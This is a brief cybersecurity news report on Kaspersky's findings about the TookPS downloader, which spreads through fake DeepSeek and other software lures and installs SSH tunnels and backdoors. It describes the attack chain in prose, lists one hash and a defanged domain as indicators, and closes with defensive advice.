A new research by Kaspersky reveals that threat actors are using DeepSeek LLM as bait in multiple malicious campaigns. Initially discovered in early March, the TookPs downloader – discovered as a key malware strain- has now been found mimicking neural networks and 3D modeling tools.
Targets
Potential victims of this campaign include both individual users and organizations using AutoCAD, UltraViewer, and SketchUp. The attackers also targeted music production and personal finance software, including Ableton and Quicken, increasing the potential victim pool.
This malware also deploys modified legitimate applications, like TeamViewer, through DLL sideloading, allowing attackers to maintain persistent, covert access for longer period. This method places a malicious library alongside TeamViewer, changing its behavior without the user’s knowledge.
Technical Details
When TookPS infiltrates a system, it contacts command-and-control (C2) server. The domain of the C2 is hardcoded into the malware. Once the malware connects to the C2, it receives a base64-encoded command. This command triggers the download and execution of three PowerShell scripts.
- First script: Downloads sshd.exe, its configuration file, and an RSA key from the C2 server.
- Second script: Retrieves command-line parameters and runs the SSH server, creating a tunnel between the compromised device and the remote server.
- Third script: Attempts to download modified versions of two backdoor malware Backdoor.Win32.TeviRat and Backdoor.Win32.Lapmon.
Different samples of TookPS communicate with different C2 domains. For example, a sample with the MD5 hash 2AEF18C97265D00358D6A778B9470960 contacted bsrecov4[.]digital, but the domain was inactive during Kaspersky’s analysis.
The Bottom Line
Experts suggest that the DeepSeek lure is part of a larger campaign targeting both home users and businesses. Users are advised to avoid downloading software from suspicious or pirated sources. Organizations should implement stringent security policies to restrict downloads from unverified websites and conduct regular security related training to improve employee awareness.
Source:hxxps[://]securelist[.]com/tookps/116019/
Follow us on X and Linkedin for the latest cybersecurity news
